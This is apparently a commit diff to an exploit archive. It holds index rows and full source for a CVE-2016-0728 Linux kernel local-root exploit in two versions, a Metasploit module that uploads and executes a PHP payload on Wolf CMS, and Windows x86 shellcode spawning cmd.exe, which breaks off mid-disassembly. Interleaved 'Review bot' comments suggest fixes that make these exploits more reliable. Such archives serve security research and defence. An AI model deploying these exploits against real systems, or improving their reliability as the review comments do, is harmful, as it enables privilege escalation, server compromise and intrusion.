39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0
39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80
@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604
39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0
39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80
39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0


@ -5,12 +5,10 @@
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */
#include <stdio.h>
#include <stdlib.h>
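Review bot: the usage line `$ ./cve_2016_072 PP_KEY`, present in both the removed and the added header comment, does not match the binary the preceding gcc line builds, `cve_2016_0728`; since this hunk rewrites the header anyway, this is the moment to make it `./cve_2016_0728 PP_KEY`. The EDB-Note link line below it is unchanged and fine as context.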
@ -30,183 +28,143 @@ _commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
struct { long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
my_key_type = malloc(sizeof(*my_key_type));
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
puts("Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
puts("finished increfing");
puts("forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("fork");
return -1;
}
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("finished forking");
sleep(5);
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
/* call userspace_revoke from kernel */
puts("caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("keyctl_revoke");
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
return 0;
}
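Review bot: `get_kernel_sym()` reads `/proc/kallsyms` with `fscanf(f, "%p %c %s\n", ...)` into `char sname[256]` with no field width, so an over-long symbol name overflows the buffer; use `%255s` and treat any `ret != 3` as a parse failure rather than only `ret == 0`. Its failure path `fprintf(stdout, "Unable to obtain symbol listing!\n"); exit(0);` writes the diagnostic to stdout and exits with success; send it to stderr and exit non-zero. In `main()`, the fallback test `commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370` repeats the literals from `COMMIT_CREDS_ADDR` / `PREPARE_KERNEL_CREDS_ADDR` instead of using the macros, so editing the #defines silently disables the warning, and since the test runs only after those same macros were just assigned it is always true; compare against the macros or print the warning unconditionally in that branch. The `msgget(IPC_PRIVATE, 0644 | IPC_CREAT)` in the parent before the fork loop is never used (each child creates its own queue) and is never removed with `msgctl(..., IPC_RMID, ...)`, leaving an orphaned queue on every run.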

platforms/linux/local/40003.c (executable file, 212 lines)

@ -0,0 +1,212 @@
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
}
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}
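Review bot: `#include <unistd.h>` appears twice in the include list; drop the second copy. `sleep(-1)` in the child passes -1 to an `unsigned int` parameter and relies on wraparound to `UINT_MAX`; `pause()` states the intent (block until killed) directly. The revoke step mixes prefixes: `puts("[+] Caling revoke...")` misspells "Calling" and `perror("[+] keyctl_revoke")` uses the success marker on an error path; use `[-]` there to match the other `perror` calls. The header comment still reads `$ ./cve_2016_072 PP_KEY` under a `-o cve_2016_0728` build line, so the documented invocation does not run the built binary.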

platforms/php/remote/40004.rb (executable file, 132 lines)

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize
super(
'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in Wolfcms
version 0.8.2. This application has an upload feature that
allows an authenticated user with administrator roles to upload
arbitrary files to the '/public' directory.
},
'Author' => [
'Narendra Bhati', # Proof of concept
'Rahmat Nurfauzi' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6568'],
['CVE', '2015-6567'],
['OSVDB','126852'],
['EDB', '38000'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Wolfcms <= 0.8.2', {}]
],
'DisclosureDate' => 'Aug 28 2015',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']),
OptString.new('USER', [true, 'User to login with', '']),
OptString.new('PASS', [true, 'Password to login with', '']),
], self.class)
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/?/admin/login/login/"),
'vars_post' => {
"login[username]" => datastore['USER'],
"login[password]" => datastore['PASS'],
"login[redirect]" => "/wolfcms/?/admin"
}
})
return res
end
def exploit
upload_name = rand_text_alpha(5 + rand(5)) + '.php'
get_cookie = login.get_cookies
cookie = get_cookie.split(";")[3]
token = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/")
})
html = token.body
if html =~ /Files/
print_status("Login successfuly")
end
csrf_token = html.scan(/<input\s*id=\"csrf_token\"\s*name=\"csrf_token\"\s*type=\"hidden\"\s*value=\"(.*)"/).last.first
boundary = Rex::Text.rand_text_hex(28)
data = "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"csrf_token\"\r\n"
data << "\r\n"
data << csrf_token
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload[path]\"\r\n\r\n"
data << "/"
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload_file\"; filename=\"#{upload_name}\"\r\n"
data << "Content-Type: text/x-php\r\n"
data << "\r\n"
data << payload.encoded
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"commit\"\r\n"
data << "\r\n"
data << "Upload\r\n"
data << "-----------------------------#{boundary}--\r\n\r\n"
print_good("#{peer} - Payload uploaded as #{upload_name}")
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary,
'Cookie' => cookie,
},
'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/")
})
register_file_for_cleanup(upload_name)
print_status("#{peer} - Executing shell...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "public",upload_name),
})
end
end
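Review bot: `exploit` never verifies that authentication succeeded: `login.get_cookies` raises if `send_request_cgi` returned nil, `get_cookie.split(";")[3]` assumes a fixed position inside the Set-Cookie header, and `if html =~ /Files/` only prints on success with no `else`, so a bad USER/PASS falls through to `html.scan(...).last.first` and dies with NoMethodError on nil. Add `fail_with(Failure::NoAccess, ...)` when the response is nil or the file manager page is absent, and pick the session cookie by name rather than by index. `print_good("#{peer} - Payload uploaded as #{upload_name}")` is issued before the upload POST is sent, and the `res` from that POST is never examined; move the message after a check of `res && res.code`. `"login[redirect]" => "/wolfcms/?/admin"` hardcodes the default install path instead of deriving it from `target_uri`. Also, `print_status("Login successfuly")` misspells "successfully".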

platforms/win32/shellcode/40005.c (executable file, 273 lines)

@ -0,0 +1,273 @@
/*
# Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
# Date : 22-06-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7,10 x86
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;EAX=PEB
mov eax,[eax+0xc] ;EAX=PEB->Ldr
mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
lodsd ; EAX=ntdll.dll
xchg eax,esi ;EAX=ESI , ESI=EAX
lodsd ; EAX=Third(kernel32)
mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
;-------------------------------
mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
xor ecx,ecx
;-----------------------
Get_func:
inc ecx ;increment the ordinal
lodsd ;Get name offset
add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ;rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ;ddre
jnz Get_func
;---------------------
mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4];EDX=Pointer(offset)
add edx,ebx ;Edx=GetProcAddress
;-----------------------------
xor esi,esi
mov esi,edx ;backup of GetProcAddress
xor edi,edi
mov edi,ebx
;--------------
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ebx ;address of kernel32.dll
call edx
add esp,12
;-----------------
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365
mov [esp+3],cl
push 0x636f7250
push 0x74697845
push esp
push edi
xor edi,edi
mov edi,eax
call esi
;----------------------------
add esp,12
;LoadLibraryA("shell32.dll")
xor ecx,ecx
push ecx
push 0x416c6c64
mov [esp+3],cl
push 0x2e32336c
push 0x6c656873
push esp
xor edx,edx
mov edx,edi ;Edx=LoadLibraryA
mov edi,eax ;edi=ExitProcess
call edx
add esp,11
;------------------
;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241
mov [esp+1],cl
push 0x65747563
push 0x6578456c
push 0x6c656853
push esp
push eax
call esi
;-------------------
;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1);
add esp,13
xor ecx,ecx
push 0x41657865
mov [esp+3],cl
push 0x2e646d63
push esp
pop ecx
xor edx,edx
inc edx
push edx
xor edx,edx
push edx
push edx
push ecx
push edx
push edx
call eax
call edi
*/
/*
Disassembly of section .text:
00401000 <_start>:
401000: 31 c9 xor %ecx,%ecx
401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
401006: 8b 40 0c mov 0xc(%eax),%eax
401009: 8b 70 14 mov 0x14(%eax),%esi
40100c: ad lods %ds:(%esi),%eax
40100d: 96 xchg %eax,%esi
40100e: ad lods %ds:(%esi),%eax
40100f: 8b 58 10 mov 0x10(%eax),%ebx
401012: 8b 53 3c mov 0x3c(%ebx),%edx
401015: 01 da add %ebx,%edx
401017: 8b 52 78 mov 0x78(%edx),%edx
40101a: 01 da add %ebx,%edx
40101c: 8b 72 20 mov 0x20(%edx),%esi
40101f: 01 de add %ebx,%esi
401021: 31 c9 xor %ecx,%ecx
00401023 <Get_func>:
401023: 41 inc %ecx
401024: ad lods %ds:(%esi),%eax
401025: 01 d8 add %ebx,%eax
401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
40102d: 75 f4 jne 401023 <Get_func>
40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
401036: 75 eb jne 401023 <Get_func>
401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
40103f: 75 e2 jne 401023 <Get_func>
401041: 8b 72 24 mov 0x24(%edx),%esi
401044: 01 de add %ebx,%esi
401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx
40104a: 49 dec %ecx
40104b: 8b 72 1c mov 0x1c(%edx),%esi
40104e: 01 de add %ebx,%esi
401050: 8b 14 8e mov (%esi,%ecx,4),%edx
401053: 01 da add %ebx,%edx
401055: 31 f6 xor %esi,%esi
401057: 89 d6 mov %edx,%esi
401059: 31 ff xor %edi,%edi
40105b: 89 df mov %ebx,%edi
40105d: 31 c9 xor %ecx,%ecx
40105f: 51 push %ecx
401060: 68 61 72 79 41 push $0x41797261
401065: 68 4c 69 62 72 push $0x7262694c
40106a: 68 4c 6f 61 64 push $0x64616f4c
40106f: 54 push %esp
401070: 53 push %ebx
401071: ff d2 call *%edx
401073: 83 c4 0c add $0xc,%esp
401076: 31 c9 xor %ecx,%ecx
401078: 68 65 73 73 42 push $0x42737365
40107d: 88 4c 24 03 mov %cl,0x3(%esp)
401081: 68 50 72 6f 63 push $0x636f7250
401086: 68 45 78 69 74 push $0x74697845
40108b: 54 push %esp
40108c: 57 push %edi
40108d: 31 ff xor %edi,%edi
40108f: 89 c7 mov %eax,%edi
401091: ff d6 call *%esi
401093: 83 c4 0c add $0xc,%esp
401096: 31 c9 xor %ecx,%ecx
401098: 51 push %ecx
401099: 68 64 6c 6c 41 push $0x416c6c64
40109e: 88 4c 24 03 mov %cl,0x3(%esp)
4010a2: 68 6c 33 32 2e push $0x2e32336c
4010a7: 68 73 68 65 6c push $0x6c656873
4010ac: 54 push %esp
4010ad: 31 d2 xor %edx,%edx
4010af: 89 fa mov %edi,%edx
4010b1: 89 c7 mov %eax,%edi
4010b3: ff d2 call *%edx
4010b5: 83 c4 0b add $0xb,%esp
4010b8: 31 c9 xor %ecx,%ecx
4010ba: 68 41 42 42 42 push $0x42424241
